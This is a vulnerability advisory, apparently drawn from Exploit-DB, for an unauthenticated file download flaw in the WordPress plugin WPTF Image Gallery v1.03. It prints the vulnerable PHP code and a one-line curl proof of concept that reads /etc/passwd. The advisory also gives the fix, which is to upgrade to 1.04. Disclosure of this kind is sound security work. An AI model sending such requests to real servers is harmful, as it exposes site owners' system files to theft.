Remote file download vulnerability in wptf-image-gallery v1.03

vendor:

WPTF Image Gallery

by:

Larry W. Cashdollar

8.8

CVSS

HIGH

Remote file download

CWE

Product Name: WPTF Image Gallery

Affected Version From: 01.03

Affected Version To: 01.03

Patch Exists: YES

Related CWE: N/A

CPE: cpe:a:wordpress:wptf-image-gallery:1.03

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

Remote file download vulnerability in wptf-image-gallery v1.03

The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files.

Mitigation:

Upgrade to version 1.04 or later

Source

Exploit-DB raw data:

Title: Remote file download vulnerability in wptf-image-gallery v1.03
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-17
Download Site: https://wordpress.org/plugins/wptf-image-gallery
Vendor: https://profiles.wordpress.org/sakush100/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org
Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
Vulnerability:
  The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files.  This allows an unauthenticated user to download sensitive system files: 


  1 <?php
  2 error_reporting(0);
  3 $homepage = file_get_contents($_GET['url']);
  4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
  5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
  6 echo $homepage;
  7 ?>

CVEID:
OSVDB:
Exploit Code:
  • $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd